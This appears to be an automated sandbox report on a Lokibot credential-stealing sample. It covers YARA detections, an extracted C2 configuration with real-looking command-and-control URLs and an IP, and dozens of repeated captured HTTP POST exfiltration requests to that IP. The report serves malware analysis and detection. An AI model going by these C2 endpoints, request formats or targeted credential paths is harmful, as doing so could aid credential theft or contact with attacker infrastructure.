2.0.cbgsujmwws.exe.400000.7.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.7.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.7.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.cbgsujmwws.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.cbgsujmwws.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.cbgsujmwws.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.cbgsujmwws.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.cbgsujmwws.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.cbgsujmwws.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 76 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.133.1.20/oluwa/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: ypdTgfE0o8.exe	Virustotal: Detection: 41%			Perma Link
Source: ypdTgfE0o8.exe	ReversingLabs: Detection: 47%

Antivirus detection for URL or domain

Source: http://45.133.1.20/oluwa/five/fre.php	Avira URL Cloud: Label: malware
Source: 45.133.1.20/oluwa/five/fre.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://45.133.1.20/oluwa/five/fre.php	Virustotal: Detection: 16%			Perma Link
Source: 45.133.1.20/oluwa/five/fre.php	Virustotal: Detection: 16%			Perma Link

Machine Learning detection for sample

Source: ypdTgfE0o8.exe

Joe Sandbox ML: detected

Source: ypdTgfE0o8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: ypdTgfE0o8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: cbgsujmwws.exe, 00000001.00000003.375462128.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, cbgsujmwws.exe, 00000001.00000003.378104668.0000000002250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cbgsujmwws.exe, 00000001.00000003.375462128.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, cbgsujmwws.exe, 00000001.00000003.378104668.0000000002250000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 45.133.1.20/oluwa/five/fre.php

Source: Joe Sandbox View

ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS

Source: Joe Sandbox View

IP Address: 45.133.1.20 45.133.1.20

Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 169Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20
Source: unknown	TCP traffic detected without corresponding DNS query: 45.133.1.20

Source: ypdTgfE0o8.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cbgsujmwws.exe, cbgsujmwws.exe, 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cbgsujmwws.exe, 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

Source: unknown

HTTP traffic detected: POST /oluwa/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.133.1.20Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2D36A626Content-Length: 196Connection: close

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056A8

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cbgsujmwws.exe.9f0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.cbgsujmwws.exe.9f0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
